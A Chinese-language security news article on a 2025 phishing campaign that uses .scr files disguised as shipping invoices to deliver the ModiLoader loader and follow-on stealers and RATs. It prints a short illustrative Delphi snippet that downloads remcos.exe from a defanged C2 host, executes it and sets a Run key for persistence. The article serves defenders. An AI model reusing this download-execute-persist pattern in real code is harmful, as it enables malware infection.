恶意软件操作者利用 .scr 文件格式来分发恶意负载，他们借助这种文件在表面上看似无害的系统文件特性，实则利用其可执行的本质进行恶意活动。

网络安全研究人员近期观察到的攻击活动显示，攻击者采用了先进的策略，通过复杂的网络钓鱼计划来瞄准全球范围内的企业。

一个突出的例子是，攻击者冒充一家货运物流公司，传播 ModiLoader，这是一种长期存在的基于 Delphi 的恶意软件加载器，能够部署远程访问木马（RAT）和数据窃取程序。

Symantec 的Broadcom 分析师记录了在 2025 年 3 月至 4 月期间的一场持续攻击活动，在这次活动中，威胁行为者发送了模仿货运通知的电子邮件。

这些邮件提到了虚构的清关信息和国际货运内容，以此来增加可信度。

所附的 RAR 压缩文件中包含伪装成发票或装箱单的恶意.scr 文件，这引发了一系列事件，最终导致 ModiLoader 被部署。

该加载器随后会获取诸如 Remcos、Agent Tesla 和 Formbook 等二级恶意负载，使攻击者能够窃取凭据、监控按键操作，并建立持久的访问权限。

此次攻击的目标行业涵盖了工业机械制造、汽车、电子和广播等领域，涉及的地区包括日本、美国、以及东南亚。

这种地域和行业的多样性凸显了攻击者广泛的目标，从窃取知识产权到破坏企业运营。

感染机制和技术执行过程

攻击始于一封网络钓鱼邮件，邮件指示收件人查看一个附件 RAR 压缩文件。

压缩文件内包含一个.scr 文件，一旦解压，该文件就会执行 ModiLoader。

procedure TMainForm.Button1Click(Sender: TObject);begin

DownloadPayload(‘hxxp://malicious-c2[.]top/download/remcos.exe’);

ExecutePayload(‘%APPDATA%\remcos.exe’);

SetRegistryKey(‘HKCU\Software\Microsoft\Windows\CurrentVersion\Run’, ‘UpdateService’, ‘%APPDATA%\remcos.exe’);end;

ModiLoader 使用 HTTP GET 请求与命令控制（C2）服务器进行通信，下载经过加密的恶意负载，从而逃避基于签名的检测。

恶意软件使用进程空洞化技术，将这些恶意负载注入到诸如 explorer.exe 或 svchost.exe 等合法进程中，这种技术是用恶意代码替换可执行文件的内存段。

Symantec 的监测数据显示，该加载器进行了模块化更新，能够根据受害者的特征动态切换恶意负载。

为了对抗分析，.scr 文件会通过查询系统运行时间和已安装的安全软件来进行反沙盒检查。

如果未达到某些阈值，恶意软件就会进入睡眠循环或终止运行。一旦恶意软件激活，它会释放一个名为 “Invoice_JN-032525C.pdf” 的诱饵文档，以维持其合法性的假象，同时在后台执行恶意操作。

Symantec 通过多层防御措施来应对这些威胁，包括启发式检测（Heur.AdvML.B）和静态分析规则（Trojan.Gen.MBT）。

建议企业在高风险环境中阻止.scr 文件的执行，并实施电子邮件附件沙盒化，以便在恶意负载部署之前拦截它们。

文章原文链接:https://www.anquanke.com/post/id/306276